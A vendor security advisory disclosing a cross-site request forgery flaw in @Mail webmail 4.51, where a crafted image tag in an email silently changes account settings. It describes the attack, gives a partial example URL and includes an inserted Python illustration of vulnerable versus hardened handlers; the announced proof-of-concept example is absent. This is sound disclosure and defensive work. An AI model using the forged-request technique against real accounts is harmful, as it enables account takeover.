******************** Netragard, L.L.C Advisory ********************
ATMAIL-XRRF-ADVISORY-20061206
Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory, as the contents
of the advisory may be updated.

[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.

[Advisory Information]
----------------------------------------------------------------------
Contact               : Adriel T. Desautels
Researcher            : Philippe C. Caturegli
Advisory ID           : NETRAGARD-20061218
Product Name          : @Mail
Product Version       : 4.51
Vendor Name           : Calacode
Type of Vulnerability : Cross Site Request Forgery
Effort                : Easy
----------------------------------------------------------------------
Netragard Security Note: Source code obfuscation does not reduce the
risk profile of any application, as it has no impact on vulnerabilities
that might exist within that application. The @Mail code was obfuscated
using basic obfuscation techniques.
[Product Description]
----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device." --http://www.atmail.com--

[Technical Summary]
----------------------------------------------------------------------
It is possible to take control of an @Mail webmail email account by
exploiting a Cross Site Request Forgery (XRSF) vulnerability in the
@Mail webmail product. An attacker can send a specially crafted email
to any @Mail webmail user containing a forged "img" tag. This forged
tag, if crafted properly, will inject new settings into the @Mail
webmail user's account.

Example: http://server/webmail/util.pl?func=settings&

[Technical Details]
----------------------------------------------------------------------
Netragard has discovered a critical flaw in @Mail webmail that allows
an attacker to change arbitrary settings in a user's @Mail webmail
account. This flaw targets the util.pl page that is used to manage a
user's account settings. By default this page uses "HTTP POST" to
commit changes. Netragard has found that it is also possible to commit
settings changes using an "HTTP GET".

@Mail webmail's default configuration disables the display of images
from senders that are not in the current account's address book. Users
contained in the address book are considered to be trusted. @Mail
webmail's image loading security feature can be circumvented by using
specially crafted "img" tags embedded in emails sent to @Mail webmail
users. When an external image is referenced by an "img" tag, @Mail
webmail automatically retrieves the image and loads it as a part of the
email. If the image URL in the "img" tag is replaced by a specially
crafted URL pointing at util.pl, the resulting request commits changes
to the targeted @Mail webmail email account.
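The root cause described above is a settings endpoint that accepts state changes on a plain GET carrying only the session cookie, which is exactly the request a rendered "img" tag produces. The following Python example is added here as an illustration and is not @Mail code or Netragard's proof of concept: it models a minimal settings handler in the flawed shape beside a hardened one that refuses GET, checks the Origin/Referer header, and requires a session-bound synchronizer token. All names (TRUSTED_ORIGIN, ALLOWED_SETTINGS, the request dictionary layout, the "example.invalid" addresses and the demo key) are constructed assumptions, not values from the product or the advisory.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlparse

# Constructed demo values; a real deployment keeps the key out of source.
SERVER_SECRET = b"constructed-demo-key-not-for-real-use"
TRUSTED_ORIGIN = "https://webmail.example.invalid"      # hypothetical webmail host
ALLOWED_SETTINGS = {"replyto", "signature", "timezone"}  # hypothetical setting names


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session id).
    The server embeds it in the settings form; an <img> tag in a mail
    cannot learn it, so a forged request cannot present it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _params(request: dict) -> dict:
    """Flatten the query string (GET) or urlencoded body (POST) into a dict."""
    raw = request["query"] if request["method"] == "GET" else request["body"]
    return dict(parse_qsl(raw, keep_blank_values=True))


def vulnerable_settings_handler(request: dict, account: dict) -> int:
    """Models the flaw in the advisory: any request that carries the session
    cookie may rewrite settings, whether it arrived by GET or by POST."""
    if "session" not in request["cookies"]:
        return 401
    params = _params(request)
    if params.get("func") != "settings":
        return 400
    for key, value in params.items():
        if key != "func":
            account[key] = value
    return 200


def hardened_settings_handler(request: dict, account: dict) -> int:
    """Three independent checks, each of which alone defeats the image-tag
    vector: (1) state changes only via POST, so a GET from an <img src> is
    refused; (2) Origin or Referer must be the webmail host itself;
    (3) the body must carry the session-bound synchronizer token."""
    if "session" not in request["cookies"]:
        return 401
    if request["method"] != "POST":
        return 405
    source = request["headers"].get("Origin") or request["headers"].get("Referer", "")
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != TRUSTED_ORIGIN:
        return 403
    params = _params(request)
    expected = issue_csrf_token(request["cookies"]["session"])
    # constant-time comparison so the token cannot be guessed byte by byte
    if not hmac.compare_digest(params.get("csrf_token", ""), expected):
        return 403
    if params.get("func") != "settings":
        return 400
    for key, value in params.items():
        if key in ALLOWED_SETTINGS:  # func, csrf_token and unknown names are ignored
            account[key] = value
    return 200


def forged_image_request(session_id: str) -> dict:
    """The GET a mail client issues when it renders a hostile <img src=...>:
    the browser attaches the cookie, but there is no token and no webmail Origin."""
    return {"method": "GET",
            "query": "func=settings&replyto=forged%40example.invalid",
            "body": "", "headers": {}, "cookies": {"session": session_id}}


def legitimate_form_post(session_id: str) -> dict:
    """The POST the real settings form sends, token and Origin included."""
    token = issue_csrf_token(session_id)
    return {"method": "POST", "query": "",
            "body": f"func=settings&replyto=new%40example.invalid&csrf_token={token}",
            "headers": {"Origin": TRUSTED_ORIGIN},
            "cookies": {"session": session_id}}


if __name__ == "__main__":
    acct = {"replyto": "me@example.invalid"}
    print("vulnerable:", vulnerable_settings_handler(forged_image_request("s1"), acct), acct)
    acct = {"replyto": "me@example.invalid"}
    print("hardened  :", hardened_settings_handler(forged_image_request("s1"), acct), acct)
    print("legit post:", hardened_settings_handler(legitimate_form_post("s1"), acct), acct)
```

The GET rejection is the cheapest fix and is what util.pl lacked; the Origin check and the token are kept as defence in depth because an attacker-controlled page can still issue a cross-site POST, and a reply-to or password change is too consequential to hang on a single check.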
[Proof Of Concept]
----------------------------------------------------------------------
The below example changes the reply-to address of the victim to
attacker@haxor.org. Similar attacks can be used to change other user
settings, including the user's password.

[Vendor Status]
----------------------------------------------------------------------
Vendor Notified on                                  12/18/06
Netragard held on release date for vendor            1/05/07
Vendor is no longer responding to emails from Netragard 1/25/07
Advisory released                                    1/25/07
Advisory published                                   1/30/07

[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

http://www.netragard.com
ATMAIL-XRRF-ADVISORY-20061206